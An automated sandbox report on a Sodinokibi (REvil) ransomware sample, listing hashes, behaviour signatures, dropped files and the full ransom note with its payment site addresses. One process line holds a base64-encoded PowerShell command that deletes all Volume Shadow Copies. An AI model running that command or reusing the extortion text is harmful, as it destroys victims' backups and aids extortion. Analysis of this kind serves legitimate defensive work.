Resubmissions

07-09-2023 14:45

230907-r45fysaf5s 10

07-09-2023 14:12

230907-rjbyxaad5s 10

Analysis

  • max time kernel
    153s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    07-09-2023 14:12

General

  • Target

    6af766a07ccc641da303ab30936ed32ad32bb4d7c983f3df45c4c52c036e9d20.exe

  • Size

    165KB

  • MD5

    1701c19d9610ee4be543815bff908281

  • SHA1

    44821ddb87e0260ee8ba368e08c75b0ad3232923

  • SHA256

    6af766a07ccc641da303ab30936ed32ad32bb4d7c983f3df45c4c52c036e9d20

  • SHA512

    6794cb5b710b5165dfb59a6dcecff7776dce69b452b82e51dd9d35ec951e15febe9d71ceedc7ea91845b0d6e8c4214e7c07935dd2c8dd6f5c372e35971eed5ae

  • SSDEEP

    3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/NabPos:lw02sJPi7O93N9s

Malware Config

Extracted

Path

C:\Users\46nq28a1y-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 46nq28a1y. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/92E721391799B020 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/92E721391799B020 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 2odI4YXUoImYYq//TjI7VlsGNOX5QrZ+NFxJMkRvqVZSogt5kN1thqNyKx1vvBpb vqwofNQUjS3gjrnSH0Qbb8mc6SlOtXpiLnBdAVly+li6SWNClQoXdiZLpvAiD0q5 W37QlMbMV/KHcFHUbEtyfSIo764O09+FIhhTeJqx+JJbu6wmDOprUR2VNBJOKA9h TQP5MaFWYEa6khC2RwmSRPQvJLoft9xEF4/cXvbuuP0IOgUMHKlRMAIzyMH/jmur dU3pj1zvIhTrJFEu6fJXcWYYufstXYEFS3vw5FLbGHFn3o/qkqqhMFQUcEFddnR0 5BY9l4Ei001vZtaoohluwxqz+gqH31Yb5trsXWfxBmkSaQotLeRyJyk7J8rOJdOI puHQIc50QFKNEF/zzNUxXrlUBzfUNszDyBsgtuZAxGV9YyjLz4GG3weDdC6ZAT0h ZJ7hXQngngvpSiGFn03EiXAGWqWP58bwd37z817Nf5sawXQdPTQM9QMDYsIhuoKq 4dqgCzZi8NadIWX9N+rm19mVdovKB46yLWwAvFCf7w1kF3XQq/3FIcg8LNEIC1v7 sOvYbqFI24M4A6xJ8w0fQP/LywEEoN27g/ZWVuTIsU69iV51jWQPDGpm1489LibF 9IPS+Q7cPCGg0Xs1M5ZowCBEUlvqVcGhJhdbCUkH3itL8JxzEHGGQ42U2izNQKLA xeFcpctadx4vRB0wuyZC/4iOe70WUWKtkyhjyc54KT+0YIZjuQkgB+D2DXE1f5wt zbbDv/AZ15M5aOifR6GbsGqodtRpGxjiupxZwhLnrNLFgMuwXoX1EazWxK4p4ATr C0zZCSSaj9s8/YoldZ+aOvzDxMevjgO5AJpRJNd4ODvGe2NdcOIEng91DwLY8Erg tQl+XPTsTrWzyoRamNfhCBHa/3LGLlvVC6mHMvzmUVKRsBS7ub/VYyurOmdmlzsH /u+I7WzKfDfFvytqx2AmAeHLWCSJ0muU6PxH6N7rfy8N2VqhBb/ja0woAuZjybU0 uKpGS52JwUejgUo3qyHi/9khr+ejZcNhjQokmkIUsLmga4t5MWdJAVhDI1Q4Otod S1TAaOl03Xn9H2z0mz4YBUGlaqucUZxkwkyN8IdYkOLtu4MFp9LvRJPEddi2d3SF 1EQxZw00RWuDNT8Oh+NOp9CQadiXlRonIyT5zOIcC0kxXcVqJ+TsIhRvL4JHRXd2 zTIPmGaRolXocv1kGWI= Extension name: 46nq28a1y ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/92E721391799B020

http://decryptor.top/92E721391799B020

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6af766a07ccc641da303ab30936ed32ad32bb4d7c983f3df45c4c52c036e9d20.exe
    "C:\Users\Admin\AppData\Local\Temp\6af766a07ccc641da303ab30936ed32ad32bb4d7c983f3df45c4c52c036e9d20.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2528
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2588
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2728

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\46nq28a1y-readme.txt

      Filesize

      6KB

      MD5

      a6fc205ed1e8cfc40d1309a387188e06

      SHA1

      6960ee4f4512ddd3072c5eba07c4b5743d5476d5

      SHA256

      2c4d8890655371c9e83dff84c1caabfbe5b7e4473ab2664cd345e704560cf76a

      SHA512

      132d2a44e025199916dc2e93ac8e9e0d0eaafc643c546510edd0b4e72aa2a2b2158c1d9151e2577386624cf0b2a23c06a3305ffac746bc66f66ebd4439a8dc0d

    • C:\Users\Admin\AppData\Local\Temp\CabCB0.tmp

      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\TarD10.tmp

      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      194KB

      MD5

      d35b3ca3abefb8578ed8ae2e443e99c9

      SHA1

      d6345e6aa6458cb5c1667b81829f7dc5de8edb24

      SHA256

      015cf3ce19000596358d85310643ea916ac50c97bd7771e8be25ebb712fe279f

      SHA512

      a73453492916222789b939db90dab6384ab49feda9b731eb75fb3d2c238b37f4aaee5fd4e5d9c2f0bdfd84f5c2d97c8d6da7cc199a79e7787911a9aeb82871da

    • memory/2528-12-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

      Filesize

      9.6MB

    • memory/2528-15-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2528-10-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

      Filesize

      9.6MB

    • memory/2528-11-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2528-4-0x000000001B260000-0x000000001B542000-memory.dmp

      Filesize

      2.9MB

    • memory/2528-13-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2528-14-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2528-9-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2528-16-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

      Filesize

      9.6MB

    • memory/2528-17-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

      Filesize

      9.6MB

    • memory/2528-8-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2528-7-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2528-6-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

      Filesize

      9.6MB

    • memory/2528-5-0x0000000002410000-0x0000000002418000-memory.dmp

      Filesize

      32KB